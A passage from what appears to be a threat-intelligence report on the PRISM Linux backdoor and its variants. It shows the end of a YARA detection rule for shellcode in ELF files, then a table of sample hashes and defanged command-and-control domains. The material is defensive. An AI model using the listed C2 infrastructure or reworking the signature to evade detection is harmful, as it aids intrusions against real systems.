[4]&#10;&#10;           89 C7&#10;&#10;           E8&#10;&#10;       }&#10;&#10;&#10;   condition:&#10;&#10;       uint32(0) == 0x464C457F and&#10;&#10;       filesize &gt; 500KB and filesize &lt; 5MB and&#10;&#10;       5 of ($s*) and&#10;&#10;       all of ($c*) and&#10;&#10;       #shellcode == 2&#10;&#10;}</pre>
			</td>
		</tr>
	</tbody>
</table>
</div>
<p>&nbsp;</p>
<h2>Associated indicators (IOCs)</h2>

<p>The following technical indicators are associated with the reported intelligence. A list of indicators is also available in the <a href="https://otx.alienvault.com/pulse/60c31c4e4978e9721446c121" target="_blank">OTX Pulse</a>. Please note, the pulse may include other activities related but out of the scope of the report.</p>

<div class="table-responsive">
	<table style="border-collapse:collapse" class="table">
	<tbody>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:2px solid #959595; height:27px; padding:24px;">
			<p>TYPE</p>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:2px solid #959595; height:27px; padding:24px;">
			<p>INDICATOR</p>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:2px solid #959595; height:27px; padding:24px;">
			<p>DESCRIPTION</p>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:35px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:35px; padding:24px;">
			<pre>
05fc4dcce9e9e1e627ebf051a190bd1f73bc83d876c78c6b3d86fc97b0dfd8e8</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:35px; padding:24px;">
			<pre>
PRISM v0.5</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:35px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:35px; padding:24px;">
			<pre>
0af3e44967fb1b8e0f5026deb39852d4a13b117ee19986df5239f897914d9212</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:35px; padding:24px;">
			<pre>
PRISM v0.5</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:35px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:35px; padding:24px;">
			<pre>
0f42b737e30e35818bbf8bd6e58fae980445f297034d4e07a7e62a606d219af8</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:35px; padding:24px;">
			<pre>
Tiger0.5</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:35px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:35px; padding:24px;">
			<pre>
0fba35856fadad942a59a90fc60784e6cceb1d8002af96d6cdf8e8c3533025f7</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:35px; padding:24px;">
			<pre>
PRISM v0.5 (stripped down)</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
342e7a720a738bf8dbd4e5689cad6ba6a4fc6dd6808512cb4eb294fb3ecf61cd</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
PRISM v0.5 (stripped down)</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
3a3c701e282b7934017dadc33d95e0cc57e43a124f14d852f39c2657e0081683</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
PRISM v0.5 (stripped down)</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
5999c1a4a281a853378680f20f6133e53c7f6d0167445b968eb49b844f37eab5</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
PRISM v0.5</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
98fe5ed342da2b5a9d206e54b5234cfeeed35cf74b60d48eb0ef3dd1d7d7bd59</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
PRISM v1</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
a8c68661d1632f3a55ff9b7294d7464cc2f3ece63a782c962f1dc43f0f968e33</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
Udevd v1.0</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
af55b76d6c3c1f8368ddd3f9b40d1b6be50a2b97b25985d2dde1288ceab9ff24</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
PRISM v0.5 (stripped down)</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
b6844ca4d1d7c07ed349f839c861c940085f1a30bbc3fc4aad0b496e8d492ce0</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
WaterDropx v12</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
b8215cafbea9c61df8835a3d52c40f9d2c6a37604dd329ef784e9d92bad1f30f</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
PRISM v0.5</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
b8cceb317a5d2febcd60318c1652af61cd3d4062902820e79a9fb9a4717f7ba2</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
PRISM  v0.5</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
be7ec385e076c1c1f676d75e99148f05e754ef5b189e006fb53016ce9aef59e0</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
PRISM v0.5 (stripped down)</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
c679600b75c6e84b53f4e6e21f3acbec1621c38940c8f3756d0b027c7a058d9c</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
PRISM v0.5</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
c802fa50409edf26e551ee0d134180aa1467a4923c759a2d3204948e14a52f12</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
PRISM v0.5</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
c8525243a68cba92521fb80a73136aaa19794b4772c35d6ecfec0f82ecad5207</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
PRISM v0.5</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
d3fa1155810be25f9b9a889ee64f845fc6645b2b839451b59cfa77bbc478531f</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
WaterDropx v9</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
dd5f933598184426a626d261922e1e82cb009910c25447b174d46e9cac3d391a</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
WaterDropx v7</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
e14d75ade6947141ac9b34f7f5743c14dbfb06f4dfb3089f82595d9b067e88c2</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
PRISM v2.2</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
f126c4f8b4823954c3c69121b0632a0e2061ef13feb348eb81f634379d011913</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
PRISM v3</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
DOMAIN</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
457467[.]com</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
Command &amp; Control server</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SUBDOMAIN</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
zzz.457467[.]com</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
Command &amp; Control server</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
DOMAIN</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
rammus[.]me</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
Command &amp; Control server</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SUBDOMAIN</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
s.rammus[.]me</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
Command &amp; Control server</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SUBDOMAIN</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
sw.rammus[.]me</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
Command &amp; Control server</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
DOMAIN</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
wa1a1[.]com</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
Command &amp; Control server</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SUBDOMAIN</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
www.wa1a1[.]com</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
Command &amp; Control server</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
DOMAIN</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
waterdropx[.]com</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
Command &amp; Control server</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SUBDOMAIN</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
r.waterdropx[.]com</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
Command &amp; Control server</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SUBDOMAIN</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
spmood222.mooo[.]com</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
Command &amp; Control server</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
933b4c6c48f82bbb62c9b1a430c7e758b88c03800c866b36c2da2a5f72c93657</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
PrismaticSuccessor (packed)</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
aaeee0e6f7623f0087144e6e318441352fef4000e7a8dd84b74907742c244ff5</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
PrismaticSuccessor (unpacked)</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
baf2fa00711120fa43df80b8a043ecc0ad26edd2c5d966007fcd3ffeb2820531</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
PrismaticSuccessor (packed)</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
f19043c7b06db60c8dd9ff55636f9d43b8b0145dffe4c6d33c14362619d10188</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
PRISM backdoor</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
eeabee866fd295652dd3ddbc7552a14953d91b455ebfed02d1ccdee6c855718d</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
PRISM backdoor</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
3a4998bb2ea9f4cd2810643cb2c1dae290e4fe78e1d58582b6f49b232a58575a</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
PRISM backdoor</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
3366676681a31feadecfe7d0f5db61c4d6085f5081b2d464b6fe9b63750d4cd8</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
PRISM backdoor</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
cc3752cc2cdd595bfed492a2f108932c5ac28110f5f0d30de8681bd10316b824</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
PrismaticSuccessor (packed)</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
baf2fa00711120fa43df80b8a043ecc0ad26edd2c5d966007fcd3ffeb2820531</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
PrismaticSuccessor (packed)</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
eb64ee2b6fc52c2c2211018875e30ae8e413e559bcced146af9aa84620e3312f</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
PRISM backdoor</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
d1d65b9d3711871d8f7ad1541cfbb7fa35ecc1df330699b75dd3c1403c754278</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
PRISM backdoor</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
77ddc6be62724ca57ff45003c5d855df5ff2b234190290545b064ee4e1145f63</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
PrismaticSuccessor (packed)</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
1de9232f0bec9bd3932ae3a7a834c741c4c378a2350b4bbb491a102362235017</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
PRISM backdoor</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
7ed15e59a094ca0f9ccac4c02865172ad67dcfc5335066f67fe3f11f68dd7473</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
PRISM backdoor</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
1eb6973f70075ede421bed604d7642fc844c5a47c53d0fb7a9ddb21b0bb2519a</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
PRISM backdoor</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
6f983303bb82d8cc9e1ebf8c6c1eb7c17877debc66cd1ac7c9f78b24148a4e46</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
PRISM backdoor</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
e4fe57d9d2c78a097f38cba7a9aad7ca53da24ecbcad0c1e00f21d34d8a82de4</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
PRISM backdoor</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
b08d48cc12c6afa5821a069bd6895175d5db4b5a9dde4e04d587c3dec68b1920</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
PRISM backdoor</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
DOMAIN</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
z0gg[.]me</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
Command &amp; Control</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
DOMAIN</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
x63[.]in</pre>
			</td>
